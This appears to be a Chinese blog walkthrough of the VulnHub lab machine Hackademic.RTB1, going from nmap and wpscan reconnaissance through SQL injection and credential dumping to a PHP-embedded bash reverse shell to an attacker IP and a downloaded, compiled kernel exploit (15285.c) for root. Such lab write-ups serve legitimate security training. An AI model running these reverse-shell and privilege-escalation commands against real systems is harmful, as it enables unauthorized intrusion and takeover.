vulnhub系列:Hackademic.RTB1

vulnhub系列:Hackademic.RTB1

靶机下载

一、信息收集

nmap 扫描存活,根据 mac 地址寻找 IP

复制代码
nmap 192.168.23.0/24

nmap 扫描端口,开放端口:22、80

复制代码
nmap 192.168.23.143 -p- -Pn -sV -O

访问80端口,页面发现 target 可以点击

点击后跳转,页面提示目标是读取到 key.txt 文件

wappalyzer 查看网站使用的 cms、语言等

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

dirb目录扫描

复制代码
dirb http://192.168.23.143/

前面发现为 wordpress,kali 使用 wpscan 扫描网站

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wp-admin,发现后台登录页面

复制代码
http://192.168.23.143/Hackademic_RTB1/wp-admin

使用 wpscan 扫描用户

使用 cewl 爬取网站密码文本

复制代码
cewl 192.168.23.143 -w pass.txt

爆破没有爆破出来

findsomething 中有一些参数,尝试sql注入,发现存在sql注入

复制代码
192.168.23.143/Hackademic_RTB1/?cat=1

dump 下数据,获取账号密码

可以看到有个10级用户,直接登录这个账号

复制代码
GeorgeMiller:q1w2e3

发现后台的 php 文件,且给出了文件路径

添加 phpinfo();,访问文件发现可以解析执行

二、getshell

写入一句话 getshell

复制代码
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.133/4444 0>&1'");

kali 开启监听

复制代码
nc -lvnp 4444

访问文件,反弹成功

复制代码
http://192.168.23.143/Hackademic_RTB1/wp-content/plugins/hello.php

三、提权

使用 python 提升交互性

复制代码
python -c "import pty;pty.spawn('/bin/bash')"

查看当前权限,需要密码

复制代码
sudo -l

查看内核版本

复制代码
uname -a

搜一下相关版本的提权漏洞

复制代码
searchsploit linux kernel 2.6.3

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

复制代码
searchsploit -m 15285

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

复制代码
python3 -m http.server

wget http://192.168.23.133:8000/15285.c

进行编译后,执行文件,提权成功

复制代码
gcc 15285.c -o 15285
./15285

在 root 目录下发现 flag

相关推荐
treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
上海云盾第一敬业销售14 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手14 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub14 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61114 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
爱网络爱Linux14 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc14 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing14 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
顾凌陵14 天前
Web安全二阶段综合测试:知识点速查与实战技巧
安全·web安全